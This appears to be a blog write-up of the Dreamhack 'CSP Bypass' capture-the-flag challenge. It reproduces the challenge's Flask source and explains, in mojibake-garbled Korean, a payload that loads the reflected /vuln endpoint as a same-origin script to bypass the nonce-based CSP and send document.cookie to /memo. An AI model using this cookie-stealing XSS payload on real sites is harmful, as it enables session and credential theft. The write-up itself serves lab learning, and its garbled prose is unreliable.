[2025-08-05] CSP Bypass
๐ฆฅ ๋ณธ๋ฌธ
- app.py
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
nonce = os.urandom(16).hex()
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.after_request
def add_header(response):
global nonce
response.headers[
"Content-Security-Policy"
] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'"
nonce = os.urandom(16).hex()
return response
@app.route("/")
def index():
return render_template("index.html", nonce=nonce)
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html", nonce=nonce)
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return f'<script nonce={nonce}>alert("wrong??");history.go(-1);</script>'
return f'<script nonce={nonce}>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text, nonce=nonce)
app.run(host="0.0.0.0", port=8000)
๊ธฐ์กด์ XSS ๋ฌธ์ ๋ค๊ณผ ์ ์ฌํ๋ค.
์ถ๊ฐ๋ ์ ์ request ์ดํ์ add_header()
๋ฉ์๋๋ฅผ ์ถ๊ฐํ๋ค๋ ๊ฒ์ด๋ค.
-
๋ค์๊ณผ ๊ฐ์ CSP ํค๋๋ฅผ ์ถ๊ฐํ๋ค
"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}
-
nonce
๊ฐ์ ๋ณด์์์ผ๋ก ์์ ํ ๋๋ค๊ฐ์ผ๋ก ์ค์ ํ๋ค.
nonce
๋ถ๋ถ์ ํด๊ฒฐํ๊ธฐ ์ํด์๋ ์ธ๋ถ JS ๋ก๋๋ฅผ ํตํด ์ฐํํด์ผ ํ๋ค. ๋ง์นจ script-src
๋ โselfโ
์ด๋ฏ๋ก ๋ค์๊ณผ ๊ฐ์ด ์์ฑํ๋ค.
<script src="/vuln?param=document.location='/memo?memo='+document.cookie"></script>
๋ผ์ผ ๋๋ ์ฝ๋์ธ๋ฐ ์ ์๋ ๊น ํ๋ค๊ฐ ๋ค์๊ณผ ๊ฐ์ด ํ์๋ค.
ํ์ด
<script src="/vuln?param=document.location='/memo?memo='%2bdocument.cookie"></script>
- ์น ๋๋ผ์ด๋ฒ์์
<script src="โฆ >
๋ฅผ ํตํด ์คํํ์ฌ ์ธ๋ถ JS๋ฅผ ๊ฐ์ ธ์จ๋ค- ์ด๋ src๋
document.location
์ด๋ฏ๋กscript-src โselfโ
๋ฅผ ์ฐํ - ์ธ๋ถ JS๋ฅผ ๋ก๋ํ๊ธฐ ๋๋ฌธ์
nonce
์ฐํ
- ์ด๋ src๋
-
+
๊ฐ ์๋%2b
๋ก ์ฌ์ฉ์๋ํ๋ฉด ์ธ๋ถ JS๋ฅผ ๋ก๋ํ ๋ ์๋ ์ธ์ฝ๋ฉ์ด ์๋๊ธฐ ๋๋ฌธ์ ์๋์ฒ๋ผ ์๋
+
๋ URL์์ ๊ณต๋ฐฑ์ผ๋ก ํด์๋๊ธฐ ๋๋ฌธ์ URL ์ธ์ฝ๋ฉ.
Leave a comment